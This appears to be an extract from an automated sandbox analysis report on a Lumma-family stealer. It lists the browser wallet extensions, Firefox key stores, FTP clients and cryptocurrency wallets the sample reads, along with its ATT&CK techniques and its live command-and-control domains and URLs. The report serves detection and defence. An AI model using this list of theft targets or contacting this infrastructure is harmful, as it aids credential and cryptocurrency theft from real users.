Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: Yara match | File source: 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: aspnet_regiis.exe PID: 5772, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: Process Memory Space: aspnet_regiis.exe PID: 5772, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.binstr, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic; the number in front of a technique is the count shown in the report's matrix cell)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 12 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 311 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 231 Virtualization/Sandbox Evasion; 311 Process Injection; 11 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 System Time Discovery; 331 Security Software Discovery; 1 Process Discovery; 231 Virtualization/Sandbox Evasion; 11 File and Directory Discovery; 33 System Information Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Screen Capture; 1 Archive Collected Data; 41 Data from Local System; 2 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 21 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
Loader.exe | 49% | Virustotal |
Loader.exe | 70% | ReversingLabs | Win32.Spyware.Lummastealer
Loader.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\gdi32.dll | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\gdi32.dll | 63% | ReversingLabs | Win32.Trojan.LummaC

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
https://community.fastly.steamst | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/Sg5h | 100% | Avira URL Cloud | malware
https://store.steampowered.c | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/uo | 100% | Avira URL Cloud | malware
https://checkout.steampow | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/s~ | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/T | 100% | Avira URL Cloud | malware
https://community.fastly.st | 0% | Avira URL Cloud | safe
https://login.steamp | 0% | Avira URL Cloud | safe
https://community.fastly.steamstatic.co | 0% | Avira URL Cloud | safe
https://sketchfab.b | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.55.153.106 | true | false | | high
lev-tolstoi.com | 172.67.157.254 | true | false | | high
cashfuzysao.buzz | unknown | unknown | false | | high
scentniej.buzz | unknown | unknown | false | | high
inherineau.buzz | unknown | unknown | false | | high
prisonyfork.buzz | unknown | unknown | false | | high
ingreem-eilish.biz | unknown | unknown | true | | unknown
rebuildeso.buzz | unknown | unknown | false | | high
appliacnesot.buzz | unknown | unknown | false | | high
hummskitnj.buzz | unknown | unknown | false | | high
screwamusresz.buzz | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
scentniej.buzz | false | | high
https://steamcommunity.com/profiles/76561199724331900 | false | | high
rebuildeso.buzz | false | | high
appliacnesot.buzz | false | | high
screwamusresz.buzz | false | | high
cashfuzysao.buzz | false | | high
inherineau.buzz | false | | high
https://lev-tolstoi.com/api | false | | high
hummskitnj.buzz | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://store.steampowered.c | aspnet_regiis.exe, 00000003.00000002.2243324793.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242472000.00000000035CD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/?subsection=broadcasts | aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamst | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://community.fastly.steamstatic.com/publ | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/subscriber_agreement/ | aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.fastly. | aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/linkfilter/?u= | aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243324793.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242472000.00000000035CD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/recaptc | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/skin_1/profiw | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.valvesoftware.com/legal.htm | aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en | aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.youtube.com | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/T | aspnet_regiis.exe, 00000003.00000003.2103505793.000000000354C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl | aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis | aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s.ytimg.com; | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english& | aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/Sg5h | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://steambroadcast-test.akamaized | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/ | aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steam.tv/ | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/ | aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243704509.0000000005C00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035DC000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://store.steampowered.com/privacy_agreement/ | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/s~ | aspnet_regiis.exe, 00000003.00000002.2243704509.0000000005C00000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://store.steampowered.com/points/shop/ | aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://sketchfab.com | aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lv.queniujq.cn | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/profiles/76561199724331900/inventory/ | aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.youtube.com/aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://community.fastly.steamstatic.aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/globaspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.google.com/recaptcha/aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://checkout.steampowered.com/aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
